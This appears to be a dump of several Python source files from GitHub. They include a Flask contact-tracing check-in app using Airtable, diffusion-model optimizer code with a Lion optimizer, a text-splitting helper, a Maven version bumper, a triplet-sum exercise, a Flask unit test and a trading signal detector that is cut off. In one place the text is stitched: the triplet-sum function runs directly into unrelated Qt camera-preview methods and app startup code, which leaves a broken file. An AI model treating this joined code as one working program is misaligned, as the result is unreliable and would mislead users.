['has_won']\n","repo_name":"pouyaashghari77/Betty365","sub_path":"Betty/apps/bets/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29738928379","text":"from flask import Flask, request, redirect, url_for, render_template\n\nfrom airtable import Airtable\n\nfrom dotenv import load_dotenv\n\nimport os\n\nimport urllib\n\nfrom urllib.request import urlopen, Request\n\nimport ast\n\nimport json\n\nfrom datetime import datetime\n\nload_dotenv()\n\napp = Flask(__name__)\n\napp.secret_key = os.getenv(\"KEY\") # Change this!\n\nusers_table = Airtable(os.getenv(\"AIRTABLE_BASE\"),\n 'Users', os.getenv(\"AIRTABLE_KEY\"))\n\n\nentry_table = Airtable(os.getenv(\"AIRTABLE_BASE\"),\n 'Entries', os.getenv(\"AIRTABLE_KEY\"))\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return render_template('home.html')\n\n\n@app.route('/checkin', methods=['GET', 'POST'])\ndef checkin():\n\n if len(users_table.search('ID Number', request.form['idNumber'])) == 0:\n return render_template('moreinfo.html', idNumber=request.form['idNumber'], storeID=request.form['storeID'])\n\n userID = users_table.search('ID Number', request.form['idNumber'])[0][\"fields\"][\"User ID\"]\n record = entry_table.match(\"Related Main Field\", userID, sort='-Entrance Time')\n \n if record != {}:\n \n if record[\"fields\"][\"Exit Time Forced\"] == 1:\n \n entry_table.update_by_field('Entry Record ID', record[\"fields\"][\"Entry Record ID\"], {'Exit Time': str(datetime.now())})\n \n contacts = entry_table.get_all(filterByFormula=\"AND(OR(\" +\n 'AND(IS_AFTER({Entrance Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_BEFORE({Entrance Time},\"' +\n str(datetime.now()) +\n '\")),' +\n 'AND(IS_AFTER({Exit Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_BEFORE({Exit Time},\"' +\n str(datetime.now()) +\n '\")),' +\n 'AND(IS_AFTER({Exit Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_BEFORE({Exit Time},\"' +\n str(datetime.now()) +\n '\")),' +\n 'AND(IS_BEFORE({Entrance Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_AFTER({Exit Time},\"' +\n str(datetime.now()) +\n '\")),' +\n 'AND(IS_SAME({Entrance Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\")),' +\n 'AND(IS_SAME({Exit Time},\"' +\n str(datetime.now()) +\n '\"))),IF({Persons ID}!=\"' +\n str(record[\"fields\"][\"Persons ID\"]) +\n '\",TRUE(),FALSE()))',)\n contactsID =[]\n for i in contacts:\n\n if i[\"fields\"][\"Related User\"][0] != record[\"fields\"][\"Related User\"][0]:\n\n contactsID.append(i[\"fields\"][\"Related User\"][0])\n\n entry_table.update_by_field('Entry Record ID', record[\"fields\"][\"Entry Record ID\"], {'Contacts': contactsID})\n\n return render_template('donecheckout.html')\n\n else:\n entry_table.insert({\"Related Place\": [request.form['storeID']],\n \"Related User\": [users_table.search('ID Number', request.form['idNumber'])[0][\"id\"]],\n \"Entrance Time\": str(datetime.now()),})\n return render_template('donecheckin.html')\n else:\n entry_table.insert({\"Related Place\": [request.form['storeID']],\n \"Related User\": [users_table.search('ID Number', request.form['idNumber'])[0][\"id\"]],\n \"Entrance Time\": str(datetime.now()),})\n return render_template('donecheckin.html')\n print(request.form['idNumber'])\n\n return render_template('donecheckin.html')\n\n\n@app.route('/registerandcheckin', methods=['GET', 'POST'])\ndef 
registerAndCheckin():\n\n users_table.insert({'Full Name': request.form['name'], \"ID Number\": request.form['idNumber'],\n 'Street Address': request.form['address'], 'Phone Number': request.form['phone']})\n\n entry_table.insert({\"Related Place\": [request.form['storeID']],\n \"Related User\": [users_table.search('ID Number', request.form['idNumber'])[0][\"id\"]],\n \"Entrance Time\": str(datetime.now()),})\n\n print(request.form['idNumber'])\n\n return render_template('donecheckin.html')\n\n\n@app.route('/service-worker.js')\ndef sw():\n return app.send_static_file('service-worker.js')\n\nif __name__ == '__main__':\n from os import environ\n app.run(debug=False, host='0.0.0.0', port=environ.get(\"PORT\", 5000))\n","repo_name":"simple-tracer/flamingo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9318630058","text":"import math\n\nfrom mmcv import Config\nfrom mmcv.runner import build_optimizer as mm_build_optimizer, OPTIMIZER_BUILDERS, DefaultOptimizerConstructor, \\\n OPTIMIZERS\nfrom mmcv.utils import _BatchNorm, _InstanceNorm\nfrom torch.nn import GroupNorm, LayerNorm\n\nfrom .logger import get_root_logger\n\nfrom typing import Tuple, Optional, Callable\n\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\n\ndef auto_scale_lr(effective_bs, optimizer_cfg, rule='linear', base_batch_size=256):\n assert rule in ['linear', 'sqrt']\n logger = get_root_logger()\n # scale by world size\n if rule == 'sqrt':\n scale_ratio = math.sqrt(effective_bs / base_batch_size)\n elif rule == 'linear':\n scale_ratio = effective_bs / base_batch_size\n optimizer_cfg['lr'] *= scale_ratio\n logger.info(f'Automatically adapt lr to {optimizer_cfg[\"lr\"]:.5f} (using {rule} scaling rule).')\n return scale_ratio\n\n\n@OPTIMIZER_BUILDERS.register_module()\nclass MyOptimizerConstructor(DefaultOptimizerConstructor):\n\n def add_params(self, params, module, prefix='', is_dcn_module=None):\n \"\"\"Add all parameters of module to the params list.\n\n The parameters of the given module will be added to the list of param\n groups, with specific rules defined by paramwise_cfg.\n\n Args:\n params (list[dict]): A list of param groups, it will be modified\n in place.\n module (nn.Module): The module to be added.\n prefix (str): The prefix of the module\n\n \"\"\"\n # get param-wise options\n custom_keys = self.paramwise_cfg.get('custom_keys', {})\n # first sort with alphabet order and then sort with reversed len of str\n # sorted_keys = sorted(sorted(custom_keys.keys()), key=len, reverse=True)\n\n bias_lr_mult = self.paramwise_cfg.get('bias_lr_mult', 1.)\n bias_decay_mult = self.paramwise_cfg.get('bias_decay_mult', 1.)\n norm_decay_mult = self.paramwise_cfg.get('norm_decay_mult', 1.)\n bypass_duplicate = self.paramwise_cfg.get('bypass_duplicate', False)\n\n # special rules for norm layers and depth-wise conv layers\n is_norm = isinstance(module,\n (_BatchNorm, _InstanceNorm, GroupNorm, LayerNorm))\n\n for name, param in module.named_parameters(recurse=False):\n base_lr = self.base_lr\n if name == 'bias' and not (is_norm or is_dcn_module):\n base_lr *= bias_lr_mult\n\n # apply weight decay policies\n base_wd = self.base_wd\n if self.base_wd is not None:\n # norm decay\n if is_norm:\n base_wd *= norm_decay_mult\n # bias lr and decay\n elif name == 'bias' and not is_dcn_module:\n # TODO: current bias_decay_mult will have affect on DCN\n base_wd *= bias_decay_mult\n\n 
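# wrap each parameter in its own single-element group so lr / weight decay can be set per parameter below\n            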
param_group = {'params': [param]}\n if not param.requires_grad:\n param_group['requires_grad'] = False\n params.append(param_group)\n continue\n if bypass_duplicate and self._is_in(param_group, params):\n logger = get_root_logger()\n logger.warn(f'{prefix} is duplicate. It is skipped since '\n f'bypass_duplicate={bypass_duplicate}')\n continue\n # if the parameter match one of the custom keys, ignore other rules\n is_custom = False\n for key in custom_keys:\n if isinstance(key, tuple):\n scope, key_name = key\n else:\n scope, key_name = None, key\n if scope is not None and scope not in f'{prefix}':\n continue\n if key_name in f'{prefix}.{name}':\n is_custom = True\n if 'lr_mult' in custom_keys[key]:\n # if 'base_classes' in f'{prefix}.{name}' or 'attn_base' in f'{prefix}.{name}':\n # param_group['lr'] = self.base_lr\n # else:\n param_group['lr'] = self.base_lr * custom_keys[key]['lr_mult']\n elif 'lr' not in param_group:\n param_group['lr'] = base_lr\n if self.base_wd is not None:\n if 'decay_mult' in custom_keys[key]:\n param_group['weight_decay'] = self.base_wd * custom_keys[key]['decay_mult']\n elif 'weight_decay' not in param_group:\n param_group['weight_decay'] = base_wd\n\n if not is_custom:\n # bias_lr_mult affects all bias parameters\n # except for norm.bias dcn.conv_offset.bias\n if base_lr != self.base_lr:\n param_group['lr'] = base_lr\n if base_wd != self.base_wd:\n param_group['weight_decay'] = base_wd\n params.append(param_group)\n\n for child_name, child_mod in module.named_children():\n child_prefix = f'{prefix}.{child_name}' if prefix else child_name\n self.add_params(\n params,\n child_mod,\n prefix=child_prefix,\n is_dcn_module=is_dcn_module)\n\n\ndef build_optimizer(model, optimizer_cfg):\n # default parameter-wise config\n logger = get_root_logger()\n\n if hasattr(model, 'module'):\n model = model.module\n # set optimizer constructor\n optimizer_cfg.setdefault('constructor', 'MyOptimizerConstructor')\n # parameter-wise setting: cancel weight decay for some specific modules\n custom_keys = dict()\n for name, module in model.named_modules():\n if hasattr(module, 'zero_weight_decay'):\n custom_keys.update({(name, key): dict(decay_mult=0) for key in module.zero_weight_decay})\n\n paramwise_cfg = Config(dict(cfg=dict(custom_keys=custom_keys)))\n given_cfg = optimizer_cfg.get('paramwise_cfg')\n if given_cfg:\n paramwise_cfg.merge_from_dict(dict(cfg=given_cfg))\n optimizer_cfg['paramwise_cfg'] = paramwise_cfg.cfg\n # build optimizer\n optimizer = mm_build_optimizer(model, optimizer_cfg)\n\n weight_decay_groups = dict()\n lr_groups = dict()\n for group in optimizer.param_groups:\n if not group.get('requires_grad', True): continue\n lr_groups.setdefault(group['lr'], []).append(group)\n weight_decay_groups.setdefault(group['weight_decay'], []).append(group)\n\n learnable_count, fix_count = 0, 0\n for p in model.parameters():\n if p.requires_grad:\n learnable_count += 1\n else:\n fix_count += 1\n fix_info = f\"{learnable_count} are learnable, {fix_count} are fix\"\n lr_info = \"Lr group: \" + \", \".join([f'{len(group)} params with lr {lr:.5f}' for lr, group in lr_groups.items()])\n wd_info = \"Weight decay group: \" + \", \".join(\n [f'{len(group)} params with weight decay {wd}' for wd, group in weight_decay_groups.items()])\n opt_info = f\"Optimizer: total {len(optimizer.param_groups)} param groups, {fix_info}. 
{lr_info}; {wd_info}."\n    logger.info(opt_info)\n\n    return optimizer\n\n\n@OPTIMIZERS.register_module()\nclass Lion(Optimizer):\n    def __init__(\n            self,\n            params,\n            lr: float = 1e-4,\n            betas: Tuple[float, float] = (0.9, 0.99),\n            weight_decay: float = 0.0,\n    ):\n        assert lr > 0.\n        assert all([0. <= beta <= 1. for beta in betas])\n\n        defaults = dict(lr=lr, betas=betas, weight_decay=weight_decay)\n\n        super().__init__(params, defaults)\n\n    @staticmethod\n    def update_fn(p, grad, exp_avg, lr, wd, beta1, beta2):\n        # stepweight decay\n        p.data.mul_(1 - lr * wd)\n\n        # weight update\n        update = exp_avg.clone().lerp_(grad, 1 - beta1).sign_()\n        p.add_(update, alpha=-lr)\n\n        # decay the momentum running average coefficient\n        exp_avg.lerp_(grad, 1 - beta2)\n\n    @staticmethod\n    def exists(val):\n        return val is not None\n\n    @torch.no_grad()\n    def step(\n            self,\n            closure: Optional[Callable] = None\n    ):\n\n        loss = None\n        if self.exists(closure):\n            with torch.enable_grad():\n                loss = closure()\n\n        for group in self.param_groups:\n            for p in filter(lambda p: self.exists(p.grad), group['params']):\n\n                grad, lr, wd, beta1, beta2, state = p.grad, group['lr'], group['weight_decay'], *group['betas'], \\\n                                                    self.state[p]\n\n                # init state - exponential moving average of gradient values\n                if len(state) == 0:\n                    state['exp_avg'] = torch.zeros_like(p)\n\n                exp_avg = state['exp_avg']\n\n                self.update_fn(\n                    p,\n                    grad,\n                    exp_avg,\n                    lr,\n                    wd,\n                    beta1,\n                    beta2\n                )\n\n        return loss\n","repo_name":"Navezjt/PixArt-alpha","sub_path":"diffusion/utils/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30201562650","text":"'''\nDescription: \nAuthor: Shengxiang Hu\nGithub: https://github.com/MTleen\nDate: 2021-08-02 10:06:37\nLastEditors: Shengxiang Hu\nLastEditTime: 2021-08-03 15:10:27\nFilePath: /NER_bert_29/home/user/shu/infoExtraction/tools/man_utils.py\n'''\nimport numpy as np\nimport os\nimport json\n\ndef seg_text(data, max_length):\n    # split overly long sentences\n    # to preserve semantic completeness, take the longest semantically complete substring shorter than self.test_max_length\n    sep_list = [',', '。']\n    # indices of every ',' or '。' separator in the original text\n    sep_idx = [i for i, t in enumerate(data) if t in sep_list]\n    # map each separator index to its target chunk based on max_length\n    sep_idx_mask = (np.array(sep_idx) // max_length).tolist()\n    data_trunc = []\n    start_idx = 0\n    for i in list(set(sep_idx_mask))[1:]:\n        end_idx = sep_idx[sep_idx_mask.index(i)] + 1\n        subseq = data[start_idx: end_idx]\n        if len(subseq) > 0:\n            data_trunc.append({'text': data[start_idx: end_idx], 'hash': hash(data)})\n            # data_trunc.append({'text': data[start_idx: end_idx], 'hash': hash(data), 'origin_text': data})\n        # start_idx = end_idx + 1\n    if start_idx < len(data):\n        data_trunc.append({'text': data[start_idx:], 'hash': hash(data)})\n        # data_trunc.append({'text': data[start_idx:], 'hash': hash(data), 'origin_text': data})\n    return data_trunc\n\n\ndef restore_text(orig_text, preds):\n    # fragments of the original text\n    pred_result = []\n    pred_res_dict = {}\n    for item in zip(orig_text, preds):\n        hash_val = item[0]['hash']\n        tmp_dict = {'text': item[0]['text'], 'entities': item[1]}\n        if hash_val in pred_res_dict.keys():\n            # restore entity indices relative to the re-joined text\n            if len(tmp_dict['entities']) > 0:\n                for e in tmp_dict['entities']:\n                    e['start_idx'] += len(pred_res_dict[hash_val]['text']) + 1\n                    e['end_idx'] += len(pred_res_dict[hash_val]['text']) + 1\n\n            pred_res_dict[hash_val]['text'] += tmp_dict['text']\n            pred_res_dict[hash_val]['entities'] += tmp_dict['entities']\n        else:\n            pred_res_dict[hash_val] = tmp_dict\n    # 
replace the final text with the original text\n    # for item in orig_text:\n    #     pred_res_dict[item['hash']]['text'] = item['origin_text']\n    # pred_result.append(tmp_dict)\n    pred_result = list(pred_res_dict.values())\n    return pred_result","repo_name":"274349293/MedBrain","sub_path":"infoExtraction/tools/man_utils.py","file_name":"man_utils.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16427608545","text":"import re\nfrom enum import Enum\nfrom re import Match\nfrom typing import ClassVar, Dict, List, Pattern, Set, Union, cast\n\nfrom java.maven.maven_module import MavenModule\nfrom java.maven.maven_module_identifier import MavenModuleIdentifier\nfrom java.maven.xml_maven_module import XmlMavenModule\nfrom java.maven.xml_maven_module_identifier import XmlMavenModuleIdentifier\nfrom java.maven.xml_maven_property import XmlMavenProperty\nfrom utility.type_utility import get_or_else\nfrom utility.xml.xml_node import XmlNode\n\n\nclass XmlMavenProject:\n    SEMANTIC_VERSION: ClassVar[Pattern] = re.compile(\n        r"^(?P<prefix>\\D+)?(?P<major>\\d+)\\.(?P<minor>\\d+)\\.(?P<patch>\\d+)(?P<suffix>\\D.+)?$"\n    )\n    PROPERTY: ClassVar[Pattern] = re.compile(r"^\\$\\{(?P<name>[^}]+)}$")\n\n    class VersionBumpType(Enum):\n        MAJOR = "major"\n        MINOR = "minor"\n        PATCH = "patch"\n\n    def __init__(self):\n        self._modules: Dict[str, XmlMavenModule] = {}\n\n    def add_modules(self, *modules: XmlMavenModule) -> None:\n        for module in modules:\n            module_id: str = self._module_id(module)\n            if module_id not in self._modules:\n                self._modules[module_id] = module\n\n    def get_module_versions(self) -> Dict[XmlMavenModule, str]:\n        return {\n            module: self._resolve_version_property_node(module, module.identifier).text\n            for module in self._modules.values()\n        }\n\n    def bump_version(\n        self,\n        bump_type: "XmlMavenProject.VersionBumpType",\n        assert_uniform_version: bool = True,\n        write_modules: bool = True,\n    ) -> None:\n        current_versions: Dict[str, str] = {\n            self._module_id(module): version\n            for module, version in self.get_module_versions().items()\n        }\n\n        if assert_uniform_version:\n            versions: Set[str] = set(current_versions.values())\n            if len(versions) != 1:\n                raise AssertionError(\n                    f"The Maven project is expected to have a uniform version, but multiple versions were found."\n                )\n\n        updated_versions: Dict[str, str] = self._bump_versions(\n            current_versions, bump_type\n        )\n\n        for module in self._modules.values():\n            self._set_version(module, updated_versions, write_modules)\n\n    def _collect_current_versions(self) -> Dict[str, str]:\n        return {\n            self._module_id(module): self._resolve_version_property_node(\n                module, module.identifier\n            ).text\n            for module in self._modules.values()\n        }\n\n    def _module_id(self, module: Union[MavenModule, MavenModuleIdentifier]) -> str:\n        module_id: MavenModuleIdentifier\n        if isinstance(module, MavenModule):\n            module_id = cast(MavenModule, module).identifier\n\n        elif isinstance(module, MavenModuleIdentifier):\n            module_id = cast(MavenModuleIdentifier, module)\n\n        else:\n            raise AssertionError(f"Unable to determine module id of '{module}'.")\n\n        return f"{module_id.group_id}:{module_id.artifact_id}"\n\n    def _bump_versions(\n        self, versions: Dict[str, str], bump_type: "XmlMavenProject.VersionBumpType"\n    ) -> Dict[str, str]:\n        result: Dict[str, str] = {}\n        for key, value in versions.items():\n            match: Match = XmlMavenProject.SEMANTIC_VERSION.match(value)\n            if match is None:\n                raise AssertionError(\n                    f"Version of module '{key}' ('{value}') is not a valid semantic 
version.\"\n )\n\n major: int = int(match.group(\"major\"))\n minor: int = int(match.group(\"minor\"))\n patch: int = int(match.group(\"patch\"))\n\n prefix: str = get_or_else(match.group(\"prefix\"), \"\")\n suffix: str = get_or_else(match.group(\"suffix\"), \"\")\n\n if bump_type == XmlMavenProject.VersionBumpType.MAJOR:\n major += 1\n minor = 0\n patch = 0\n\n elif bump_type == XmlMavenProject.VersionBumpType.MINOR:\n minor += 1\n patch = 0\n\n elif bump_type == XmlMavenProject.VersionBumpType.PATCH:\n patch += 1\n\n else:\n raise AssertionError(f\"Unknown version bump type '{bump_type}'.\")\n\n result[key] = f\"{prefix}{major}.{minor}.{patch}{suffix}\"\n\n return result\n\n def _set_version(\n self,\n module: XmlMavenModule,\n updated_versions: Dict[str, str],\n write_modules: bool,\n ) -> None:\n if module.parent_identifier is not None:\n parent_id: str = self._module_id(module.parent_identifier)\n if parent_id in updated_versions:\n self._resolve_version_property_node(\n module, module.parent_identifier\n ).text = updated_versions[parent_id]\n\n module_id: str = self._module_id(module.identifier)\n if module_id in updated_versions:\n self._resolve_version_property_node(\n module, module.identifier\n ).text = updated_versions[module_id]\n\n for dependency in module.dependencies:\n dependency_id: str = self._module_id(dependency)\n if dependency_id not in updated_versions:\n continue\n\n self._resolve_version_property_node(\n module, dependency\n ).text = updated_versions[dependency_id]\n\n if write_modules:\n module.xml_document.save(module.pom_file)\n\n def _resolve_version_property_node(\n self, module: MavenModule, module_id: MavenModuleIdentifier\n ) -> XmlNode:\n if not isinstance(module_id, XmlMavenModuleIdentifier):\n raise AssertionError(\n f\"Unable to determine version XML node for module '{module.identifier}'.\"\n )\n\n return self._resolve_property_node(\n module, cast(XmlMavenModuleIdentifier, module_id).version_node\n )\n\n def _resolve_property_node(self, module: MavenModule, node: XmlNode) -> XmlNode:\n match: Match = XmlMavenProject.PROPERTY.match(node.text)\n if match is None:\n return node\n\n return self._find_property_node(module, match.group(\"name\"))\n\n def _find_property_node(self, module: MavenModule, property_name: str) -> XmlNode:\n for p in module.properties:\n if p.name == property_name and isinstance(p, XmlMavenProperty):\n return cast(XmlMavenProperty, p).node\n\n if module.parent_identifier is None:\n raise AssertionError(\n f\"Unable to resolve property '{property_name}' in {module.identifier}.\"\n )\n\n parent_id: str = self._module_id(module.parent_identifier)\n parent_modules: List[XmlMavenModule] = list(\n filter(\n lambda x: self._module_id(x.identifier) == parent_id,\n self._modules.values(),\n )\n )\n\n if len(parent_modules) != 1:\n raise AssertionError(\n f\"Unable to determine parent module '{parent_id}' for module {module.identifier}.\"\n )\n\n return self._find_property_node(parent_modules[0], property_name)\n","repo_name":"DigitalToolsManufactory/dev-scripts","sub_path":"java/maven/xml_maven_project.py","file_name":"xml_maven_project.py","file_ext":"py","file_size_in_byte":7241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25399603301","text":"\"\"\"\nGiven an array and an integer K. Find if there's a triplet in the array which sums up to the given integer K. 
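A common approach, used in the implementation below, is to sort the array and then run a two-pointer scan for each fixed smallest element.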
\n \n\nExample 1:\n\nInput: N = 6, K = 13\narr[] = [1 4 45 6 10 8]\nOutput: true\nExplanation: The triplet {1, 4, 8} in \nthe array sums up to 13.\nExample 2:\n\nInput: N = 5, K = 10\narr[] = [1 2 4 3 6]\nOutput: true\nExplanation: The triplet {1, 3, 6} in \nthe array sums up to 10.\n\nYour Task:\nYou don't need to read input or print anything. Your task is to complete the function find3Numbers() which takes the array arr[], the size of the array (N) and the sum (X) as inputs and returns True if there exists a triplet in the array arr[] which sums up to X and False otherwise.\n\nExpected Time Complexity: O(n^2)\nExpected Auxiliary Space: O(1)\n\nConstraints:\n1 ≤ N ≤ 10^3\n1 ≤ A[i] ≤ 10^5\n"""\ndef find3Numbers(arr, N, X):\n    arr = sorted(arr)\n    for i in range(N-2):\n        l = i + 1\n        r = N - 1\n        while l < r:\n            total = arr[i] + arr[l] + arr[r]\n            if total == X:\n                return True\n            elif total < X:\n                l += 1\n            else:\n                r -= 1\n    return False\n\n    def _poll(self) -> None:\n        """\n        QTimer calls this every 20 msec or so to try and grab\n        new frame data.\n        """\n        try:\n\n            topic = self.frame_sub.recv()\n            fm = recv_frame(self.frame_sub)\n        except zmq.error.Again:\n            return\n\n        self.frame = fm\n        self._update()\n\n\n    #--------------------------------------------------------------------------#\n    # Private methods\n\n\n    def _update(self):\n        self._update_image()\n        fm = self.frame\n        if fm:\n            ix, t = fm.index, fm.time\n            self.frame_times.append(t)\n            if ix % 30 == 0:\n                tarr = np.array(list(self.frame_times))\n                diffs = np.ediff1d(tarr)\n                fps = 1 / np.mean(diffs)\n                msg = "index={}, time={:.2f}, fps={:.2f}".format(ix, t, fps)\n                print(msg)\n\n\n\n    def _update_image(self):\n\n        """Gets called by cur_frame.setter(). Bounds are guaranteed to be good.\n        """\n\n        if self.frame is None:\n            # No data: black screen, empty label.\n            self._image.setImage(np.zeros((8, 8)), levels=(0, 1))\n            return\n\n        data = self.frame.data\n        data = data.T\n        data = np.flipud(data)\n\n        self._image.setImage(data)\n\n\n    #--------------------------------------------------------------------------#\n    # Reimplemented methods\n\n\n    def keyPressEvent(self, event):\n\n        key = event.key()\n        mods = QtGui.QApplication.queryKeyboardModifiers()\n\n        # Quit/close.\n        if key in (QtCore.Qt.Key_W, QtCore.Qt.Key_Q) and \\\n           mods == QtCore.Qt.ControlModifier:\n            self.close()\n\n\n\n\napp = QtWidgets.QApplication(sys.argv)\nwin = CameraPreview()\n\napp.exec_()\ntime.sleep(0.5)\nwin.frame_sub.close()\n\n","repo_name":"scottcanoe/mesoimg","sub_path":"dev/qtplayer.py","file_name":"qtplayer.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44154622327","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport json\nimport unittest\n\nfrom app import app\nfrom config import DataBaseConfig\nfrom core.messages.keys import Keys\nfrom core.result import Result\nfrom persistence.database.entity.car_problem import CarProblem\nfrom persistence.database.entity.job_.autoservice_job import AutoServiceJob\nfrom persistence.database.entity.job_.job import Job\nfrom routers.admin import admin\nfrom routers.authintication import authentication\nfrom routers.car_owner import car_owner\nfrom routers.choose_services import choose_service_grade\nfrom routers.endpoints import Endpoints\nfrom routers.index import index_route\nfrom test_cases.fill_db import init_db\n\n\nclass SetAnAppointmentTest(unittest.TestCase):\n    # executed prior to each test\n    def setUp(self):\n        POSTGRES = {\n            'user': 'postgres',\n            'pw': 'postgres',\n            'db': 'dr-autol-test',\n            'host': 'localhost',\n            'port': '5432',\n        }\n        app.config['TESTING'] = True\n        
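# NOTE: the POSTGRES dict above is illustrative only; the URI below is assembled from DataBaseConfig\n        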
app.config['WTF_CSRF_ENABLED'] = False\n app.config['DEBUG'] = False\n app.config[\n 'SQLALCHEMY_DATABASE_URI'] = DataBaseConfig.DB_DIALECT + DataBaseConfig.USER_NAME + ':' + DataBaseConfig.PASSWORD + '@' + DataBaseConfig.SERVER_ADDRESS + ':' + DataBaseConfig.PORT + '/' + DataBaseConfig.DATABASE_NAME\n app.register_blueprint(index_route)\n app.register_blueprint(car_owner)\n app.register_blueprint(authentication)\n app.register_blueprint(admin)\n app.register_blueprint(choose_service_grade)\n\n self.app = app.test_client()\n\n # db.drop_all()\n # db.create_all()\n init_db()\n\n # Disable sending emails during unit testing\n # self.assertEqual(app.debug, False)\n\n # executed after each test\n def tearDown(self):\n pass\n\n @classmethod\n def setUpClass(cls):\n pass\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n # success scenario\n\n def _post_request(self, url, data):\n json_obj = json.dumps(data)\n response = self.app.post(url, data=json_obj, content_type='application/json')\n print(response.data)\n return response\n\n def _test_register_job_request(self, data, expected_response, expected_message, expected_params=None):\n with self.app as client:\n with client.session_transaction() as sess:\n sess['user_id'] = 1\n response = self._post_request(Endpoints.CAR_OWNER_SET_APPOINTMENT, data)\n response_dict = json.loads(response.data)\n self.assertEqual(expected_response, response.status_code)\n self.assertEqual(expected_message, response_dict[Keys.MESSAGE])\n if expected_params is not None:\n self.assertEqual(expected_params, response_dict[Keys.PARAMS])\n\n def test_set_appointment_true(self):\n job = AutoServiceJob(id=1, car_id=1, car_owner_id=1, business_owner_id=1, status_id=1, start_schedule=\"2019-1-1 2:2\", finish_schedule=\"2019-1-1 2:1\")\n # car_problems = CarProblem()\n # Jobs.register_problem(db, job, car_problems)\n data = {\n Keys.USER_TYPE: 'auto_service_job',\n \"job\": {\n \"car_owner\": 1,\n \"business_owner\": 1,\n \"car_id\": 1,\n \"car_problem\": {\n Keys.SERVICE_GRADE: \"Common\",\n Keys.SERVICE_CATEGORY: \"AutoService\",\n Keys.SERVICE_DEFINITIONS: {\n Keys.PRODUCTABLE_ITEMS: {1:1, },\n Keys.NON_PRODUCTABLE_ITEMS: []\n },\n },\n Keys.START_SCHEDULE: \"2018-06-06 18:30:33\"\n }\n }\n self._test_register_job_request(data, 200, Result.language.SUCCESS_REGISTER_PROBLEM)\n # self._test_register_job_request(data, 404, Result.language.NOT_IN_SAME_CATEGORY)\n\n def test_set_appointment_true_false(self):\n data = {\n Keys.USER_TYPE: 'auto_service_job',\n \"job\": {\n \"car_owner\": 1,\n \"business_owner\": 1,\n \"car_id\": 'dfdf',\n \"car_problem\": {\n Keys.SERVICE_GRADE: \"Common\",\n Keys.SERVICE_CATEGORY: \"AutoService\",\n Keys.SERVICE_DEFINITIONS: {\n Keys.PRODUCTABLE_ITEMS: {1: 1, 2: 1},\n Keys.NON_PRODUCTABLE_ITEMS: [1]\n },\n },\n Keys.START_SCHEDULE: \"2018-06-06 18:30:33\"\n }\n }\n self._test_register_job_request(data, 400, Result.language.BAD_SCHEMA, expected_params=Result.language.POST_VALIDATION_CAR_ID)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"afsaneh92/dr_autol","sub_path":"test_cases/amish/send_request_notification.py","file_name":"send_request_notification.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73742477672","text":"from typing import Union\n\nimport pandas as pd\nfrom sklearn.base import BaseEstimator\n\nfrom qube.quantitative.ta.indicators import smooth, rsi, ema\nfrom qube.quantitative.tools import srows, scols, 
apply_to_frame, ohlc_resample\nfrom qube.learn.core.base import signal_generator\nfrom qube.learn.core.data_utils import pre_close_time_shift\nfrom qube.learn.core.utils import _check_frame_columns\nfrom qube.simulator.utils import rolling_forward_test_split\n\n\ndef crossup(x, t: Union[pd.Series, float]):\n t1 = t.shift(1) if isinstance(t, pd.Series) else t\n return x[(x > t) & (x.shift(1) <= t1)].index\n\n\ndef crossdown(x, t: Union[pd.Series, float]):\n t1 = t.shift(1) if isinstance(t, pd.Series) else t\n return x[(x < t) & (x.shift(1) >= t1)].index\n\n\n@signal_generator\nclass RangeBreakoutDetector(BaseEstimator):\n \"\"\"\n Detects breaks of rolling range. +1 for breaking upper range and -1 for bottom one.\n \"\"\"\n\n def __init__(self, threshold=0):\n self.threshold = threshold\n\n def fit(self, X, y, **fit_params):\n return self\n\n def _ohlc_breaks(self, X):\n U, B = X.RangeTop + self.threshold, X.RangeBot - self.threshold\n open, close, high, low = X.open, X.close, X.high, X.low\n\n b1_bU = high.shift(1) <= U.shift(1)\n b1_aL = low.shift(1) >= B.shift(1)\n l_c = (b1_bU | (open <= U)) & (close > U)\n s_c = (b1_aL | (open >= B)) & (close < B)\n l_o = (b1_bU & (open > U))\n s_o = (b1_aL & (open < B))\n\n pre_close = pre_close_time_shift(X)\n\n return srows(\n pd.Series(+1, X[l_o].index), pd.Series(+1, X[(l_c & ~l_o)].index + pre_close),\n pd.Series(-1, X[s_o].index), pd.Series(-1, X[(s_c & ~s_o)].index + pre_close),\n )\n\n def _ticks_breaks(self, X):\n U, B = X.RangeTop + self.threshold, X.RangeBot - self.threshold\n a, b = X.ask, X.bid\n\n break_up = (a.shift(1) <= U.shift(1)) & (a > U)\n break_dw = (b.shift(1) >= B.shift(1)) & (b < B)\n\n return srows(pd.Series(+1, X[break_up].index), pd.Series(-1, X[break_dw].index))\n\n def predict(self, X):\n # take control on how we produce timestamps for signals\n self.exact_time = True\n\n try:\n _check_frame_columns(X, 'RangeTop', 'RangeBot', 'open', 'high', 'low', 'close')\n y0 = self._ohlc_breaks(X)\n\n except ValueError:\n 